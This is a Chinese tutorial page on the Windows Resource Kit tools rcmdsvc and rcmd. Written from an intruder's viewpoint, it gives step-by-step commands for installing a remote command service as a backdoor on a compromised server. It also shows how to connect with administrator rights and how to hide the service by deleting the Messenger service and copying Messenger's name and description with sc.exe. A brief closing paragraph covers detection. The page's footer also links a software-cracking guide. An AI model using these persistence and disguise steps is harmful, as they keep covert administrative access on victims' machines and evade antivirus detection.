windows自带的rcmd使用方法整理

所属分类: 软件教程 / 系统工具 阅读数: 399
收藏 0 赞 0 分享
rcmdsvc.exe是Windows 2000 Resource Kit中的一个小工具,是用来开启Remote Command Service服务的。这个服务开启的端口是445,与Windows 2000系统的Microsoft-DS服务开的端口一样。因为是Microsoft发布的服务,所以根本没有杀毒 软件会认为这是病毒或者木马,因此不少入侵者都把这个服务作为入侵后的后门使用。
下面将从入侵者的角度讲一下这个服务的安装、使用方法以及如何伪装成另外一个服务,从而让大家知道该如何防范。

rcmdsvc.exe安装

假设服务器被入侵后,入侵者把以后需要用到的rcmdsvc.exe等一些工具都放到了C盘根目录下,在cmd窗口里输入:rcmdsvc -install,回车后,即可看到Remote Command Service服务安装成功的提示,
这时在“控制面板”→“管理工具”→“服务”里,就可以看到这个服务了。

从图1可以看到该服务并没有启动,还需要我们来启动该服务,可以使用系统自带的net命令,在cmd窗口里输入:net start rcmdsvc,回车,我们可以看到Remote Command Service服务开始启动和成功。
rcmdsvc.exe使用方法
下面我们就可以用Windows 2000 Resource Kit中的rcmd.exe小工具进行远程连接了,并且连接后拥有管理员权限,可以添加管理员用户。

rcmdsvc.exe伪装

下面该sc.exe(Service Control的缩写)出场了,这个工具是在命令行方式下管理系统中的服务的,在Windows 2000 Resource Kit或者Windows XP中都可以找到该工具。来看一下sc.exe是如何把Remote Command Service服务伪装成Messenger这个服务的。
1.删除Messenger服务。在cmd窗口里输入:sc delete Messenger,回车,可以看到命令完成。
2.把Remote Command Service服务改名为Messenger,在进行这步前,需要重新启动一下。在cmd窗口里输入:sc config rcmdsvc DisplayName= Messenger,回车,可以看到命令完成。这时候我们到“控制面板”→“管理工具”→“服务”里,就可以看到Remote Command Service服务名变成了Messenger。但是“描述”的内容为空。为了使这个服务看起来更“合法”,我们把Messenger的“描述”也加上,在cmd窗口里输入:sc description rcmdsvc 发送和接收系统管理员或者“警报器”服务传递的消息。我们到“服务”里就可以看到rcmdsvc的“描述”被加上了Messenger的描述。只不过服务名称还是rcmdsvc。
3.再重新用net start命令启动一下rcmdsvc服务,就可以用rcmd.exe进行连接了。
为了避免电脑被入侵,把不需要的服务都关闭掉,经常检查一下开启的服务和端口,如果您经过检查发现您的电脑有rcmdsvc服务,或者该服务被伪装成了别的服务,那就要小心了,说明电脑很可能被入侵了,并被别人安装上了杀毒 软件无法查出的“合法”后门

rcmdsvc.exe使用方法:

1、rcmdsvc /install //安装后的服务名为:Remote Command Service (rcmdsvc),建议上传至windows目录
怎么用命令行改服务名和描述:
sc \\127.0.0.1 query rcmdsvc //查询整个服务
sc \\127.0.0.1 qdescription rcmdsvc //查询服务的描述
sc \\127.0.0.1 description rcmdsvc "管理和编录可移动媒
体并操作自动化可移动媒体设备。如果这个服务被停止,依赖可移动存储的程序,如备份和
远程存储将放慢速度。如果禁用这个服务,所有专依赖这个服务的服务将无法启动。" //修改服务的描述
D:\pt007\f\Pstools2.11>psservice \\127.0.0.1 setconfig rcmdsvc auto //设置服务为自动启动
2、net start rcmdsvc
3、rcmd \\127.0.0.1 ver
更多精彩内容其他人还在看

iOS Toolkit如何安装?iOS Toolkit安装方法

iOS Toolkit是一款IOS系统修复工具,用户使用该软件可以修复iOS系统在各种问题中恢复正常,包括陷入恢复模式、DFU模式、白苹果标识、黑屏、循环启动等问题,本文为大家带来的是该软件的安装教程,需要了解的朋友可以阅读下文
收藏 0 赞 0 分享

如何用NLITE来定制您的xp系统(nite教程)

nlite是一款Windows系统瘦身工具,用它给系统安装盘瘦身是当前的热门话题。利用Nlite给系统安装盘瘦身后,可以在配置较低的老机器上顺利安装和运行Win XP及2003等系统,可以让一些老机器重新焕发光彩
收藏 0 赞 0 分享

winsetupfromusb怎么用?winsetupfromusb使用方法简介

winsetupfromusb是一款U盘启动盘制作工具,winsetupfromusb怎么用?是很多新用户都想知道的问题,今天小编就给大家简单介绍一下winsetupfromusb使用方法,希望对大家有所帮助
收藏 0 赞 0 分享

msiblast怎么用?msiBlast NI卸载工具使用方法简介

msiblast怎么用?是很多新用户都想知道的问题,msiblast虽然是英文页面,但使用方法并不复杂,今天小编就给大家简单介绍一下msiBlast NI卸载工具使用方法,需要的朋友欢迎借鉴
收藏 0 赞 0 分享

数据恢复软件哪个比较好用?六款非常好用的电脑数据恢复软件推荐

目前网络上有非常多的数据恢复软件供用户选择,但不同版本的数据恢复软件使用功能不一,且免费的版本较少,本文为大家推荐介绍了几款比较好用的数据恢复软件,需要的朋友可以前来阅读下载
收藏 0 赞 0 分享

腾讯魔镜壁纸在哪里?腾讯电脑管家魔镜壁纸位置及使用方法介绍

近日,腾讯电脑管家全新升级“桌面整理-魔镜壁纸”功能,那么,腾讯魔镜壁纸在哪里?魔镜壁纸怎么用呢?今天小编就给大家带来腾讯电脑管家魔镜壁纸位置及使用方法介绍,需要的朋友快去了解一下吧
收藏 0 赞 0 分享

adobe creative suite cleaner tool怎么用?Adobe卸载清理工具使用方法介绍

adobe creative suite cleaner tool怎么用?是很多新用户都想知道的问题,今天小编就给大家带来详细的Adobe卸载清理工具使用方法介绍,并提供windows版和mac版的adobe creative suite cleaner tool免费下载
收藏 0 赞 0 分享

赤兔Bitlocker分区恢复软件常见问题及解决方法

赤兔Bitlocker分区恢复软件是一款专门恢复误操作、重装系统等原因造成的Bitlocker加密分区丢失、Bitlocker加密分区无法打开的数据恢复软件,在使用这款软件时会遇到一些问题,本文整理了最常见的问题并作出解答
收藏 0 赞 0 分享

winstep xtreme怎么破解?Winstep Xtreme17安装破解图文详细教程

最近,很多网友问小编winstep xtreme怎么破解?winstep xtreme是一款很好用的Windows电脑桌面美化工具,今天小编就给大家带来Winstep Xtreme17安装破解图文详细教程,并附有winstep xtreme破解版下载,需要的朋友欢迎借鉴
收藏 0 赞 0 分享

短信猫如何通过超级终端进行配置和调试?

短信猫是常用的短信发送设备,支持移动联通电信等运营商,今天我们就来说说短信猫如何通过超级终端进行配置和调试?如果你遇到过短信猫死机的问题,那就可以按照这个方法试试哦
收藏 0 赞 0 分享
查看更多